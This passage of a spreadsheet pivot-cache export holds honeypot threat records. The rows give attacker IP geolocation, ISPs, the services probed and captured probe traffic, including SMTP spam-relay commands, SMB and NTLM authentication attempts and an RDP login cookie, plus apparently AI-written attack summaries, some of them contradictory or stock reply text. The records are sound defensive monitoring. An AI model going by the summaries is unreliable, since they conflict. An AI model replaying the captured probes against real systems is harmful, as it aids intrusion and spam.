    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;25571&amp;&amp;NA&amp;&amp;54552"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="CMX"/>
    <s v="Mexico City"/>
    <s v="NA"/>
    <s v="Mexico City (Manantial Peña Pobre)"/>
    <s v="3530597"/>
    <s v="NA"/>
    <s v="19.2974"/>
    <s v="-99.1842"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="Uninet S.A. de C.V."/>
    <s v="business"/>
    <s v="UNINET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,64526)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,64619)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,18010)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,18081)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,11245)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,11310)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,25809)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,25847)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,64047)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,23763)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,53840)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,53928)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,20257)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,20340)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bdfe:c5ae"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates that there are no records of malicious activity yet, indicating that the system is idle or inactive. The absence of logs does not necessarily mean there's no threat; it could be due to lack of traffic or successful evasion by attackers. Further monitoring is required for accurate assessment."/>
    <m/>
  </r>
  <r>
    <x v="115"/>
    <x v="115"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:53:05"/>
    <d v="2024-06-11T16:09:00"/>
    <d v="2025-04-30T16:53:05"/>
    <n v="51"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_LDAP_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;60022&amp;&amp;3306&amp;&amp;445&amp;&amp;389&amp;&amp;1433&amp;&amp;53620"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Communication Ltd"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f4:b7a6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="116"/>
    <x v="116"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:52:06"/>
    <d v="2025-04-30T16:52:06"/>
    <d v="2025-04-30T16:52:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b639:caab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="117"/>
    <x v="117"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:26:10"/>
    <d v="2025-04-30T16:26:10"/>
    <d v="2025-04-30T16:26:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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d1:cf5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="118"/>
    <x v="118"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:21:44"/>
    <d v="2025-03-21T19:19:30"/>
    <d v="2025-04-30T16:21:44"/>
    <n v="61"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H27"/>
    <s v="25"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="KU"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="598316"/>
    <s v="44001"/>
    <s v="54.9072"/>
    <s v="24.0019"/>
    <s v="209605"/>
    <s v="UAB Host Baltic"/>
    <s v="UAB Host Baltic"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2019-01-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;pw8h-ngn@asahi-net.or.jp&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;bankofamericaonline@meta.ua&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;chiyere.ugo@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;drudorji_ojide@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;officefle20012001@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;uba.ubainfo@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;unitednation.agency@safe-mail.net&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 22 Mar 2025 19:34:55 +0100_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8d62:a82"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <s v="Someone is sending unsolicited email from the address spameri@tiscali.it and attempting to send mail via SMTP. This could be a spammer or phisher trying to use this service for malicious purposes. The email content itself is unknown but likely to contain malware or phishing links. &amp;&amp; Malicious user attempting to send spam email by trying to verify recipient's email address using SMTP. This is a reconnaissance step before sending actual malicious emails. User is testing if the recipient exists and their account can receive emails. &amp;&amp; The data suggests a potential malicious SMTP connection attempt where an attacker is attempting to send data as part of an email, which could be used for phishing or spamming purposes. The lack of specified argument and command indicates an unusual or unauthorized activity. This may indicate an exploit of the SMTP service by an attacker trying to send malicious emails. &amp;&amp; No malicious activity detected for SMTP service, indicating potential lack of interaction or probing attempts. No suspicious connections were made to this service. Data is incomplete or unavailable for SMTP logs. &amp;&amp; Malicious user attempting to reset SMTP session, possibly trying to spoof or evade detection. This could be an initial step before sending spam or phishing emails. Further analysis is needed to determine full intent and scope of the activity. &amp;&amp; This indicates a potential brute-force attack on an email account, with multiple RSET commands being sent to reset the SMTP connection and attempt further login attempts. This is often used by attackers to bypass authentication mechanisms. The sender is attempting to evade detection by not sending actual data. &amp;&amp; An unknown sender is attempting to send an email from a potentially compromised account, which may be part of a spam campaign. The sender's IP address is not provided in the log data but the email sender appears to be spoofed. This could indicate a malicious attempt to spread unsolicited emails. &amp;&amp; This log indicates a possible attempt to send spam email as an attacker is trying to verify a recipient's address for malicious purposes. The command 'RCPT' is used to specify the recipient in an SMTP communication. This could be part of a larger attack to spread malware or phishing campaigns."/>
    <s v="Spam Mail &amp;&amp; Spam Attack &amp;&amp; Spam Data &amp;&amp; Spamming Attack &amp;&amp; Portscan &amp;&amp; Brute Force &amp;&amp; SMTP Spam &amp;&amp; Spam Email"/>
  </r>
  <r>
    <x v="119"/>
    <x v="119"/>
    <s v="zl-dala-us-gp1-wk144a.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:11:42"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T16:11:42"/>
    <n v="279"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_NTP_H24&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_LDAP_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;161&amp;&amp;53&amp;&amp;10010&amp;&amp;23&amp;&amp;443&amp;&amp;1521&amp;&amp;5432&amp;&amp;143&amp;&amp;445&amp;&amp;389&amp;&amp;6667&amp;&amp;80&amp;&amp;6379&amp;&amp;9100&amp;&amp;3389&amp;&amp;110"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Dallas"/>
    <s v="4684888"/>
    <s v="75270"/>
    <s v="32.7767"/>
    <s v="-96.797"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="business"/>
    <s v="ICG 1 ZEN DFW"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;stshash&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1261124.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DCAK0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 209.145.61.177:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8d39"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="It appears that the attacker is scanning and probing various services on a network, attempting to identify vulnerabilities and potential entry points. The activities suggest reconnaissance, mapping of network infrastructure, and testing of login credentials. &amp;&amp; The attacker is scanning and probing various services on the network, attempting to identify vulnerabilities and potential entry points. They are also trying to authenticate with different credentials and test the security of systems. The attacker appears to be using a variety of techniques to gather information and potentially exploit weaknesses in the network. &amp;&amp; The system detected an attempt to access PostgreSQL database services, possibly indicating a malicious login or brute force attack effort to gain unauthorized access. This could be a sign of a larger security issue or a targeted attack on the database infrastructure. The absence of any specific action taken suggests this may have been a reconnaissance or probing activity. &amp;&amp; No log data provided, unable to analyze. _x000a_No indication of malicious activity found. _x000a_Normal system operation expected."/>
    <s v=" Credential stuffing/Brute Force attack &amp;&amp; PortScan"/>
  </r>
  <r>
    <x v="120"/>
    <x v="120"/>
    <s v="NA&amp;&amp;220-132-134-233.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-30T16:11:17"/>
    <d v="2024-12-15T20:01:11"/>
    <d v="2025-04-30T16:11:17"/>
    <n v="534"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA&amp;&amp;45784"/>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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:86e9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No available log data provided, cannot analyze malicious activity. _x000a_Malicious scripts attempting to exploit known vulnerabilities may be occurring but cannot confirm without actual logs. _x000a__x000a_(If you provide the actual log data, I'd be happy to help with a more detailed analysis.)"/>
    <s v="I need some log data to analyze. Please provide it, and I'll be happy to identify the types of attacks based on the information."/>
  </r>
  <r>
    <x v="121"/>
    <x v="121"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:10:57"/>
    <d v="2024-12-07T15:35:48"/>
    <d v="2025-04-30T16:10:57"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H4"/>
    <s v="23&amp;&amp;46485&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="28"/>
    <s v="Incheon"/>
    <s v="Namdong-gu"/>
    <s v="Namdong-gu"/>
    <s v="8417651"/>
    <s v="405-231"/>
    <s v="37.3989"/>
    <s v="126.707"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:798e:f46c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="122"/>
    <x v="122"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T16:10:26"/>
    <d v="2024-04-02T06:34:00"/>
    <d v="2025-04-30T16:10:26"/>
    <n v="347"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_RDP_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;443&amp;&amp;3389&amp;&amp;143&amp;&amp;9100&amp;&amp;1433&amp;&amp;NA&amp;&amp;25&amp;&amp;23&amp;&amp;5432&amp;&amp;80&amp;&amp;21&amp;&amp;110&amp;&amp;50208&amp;&amp;50296&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 91.194.11.82:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,37864)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '94.131.8.76:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '94.131.8.76:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 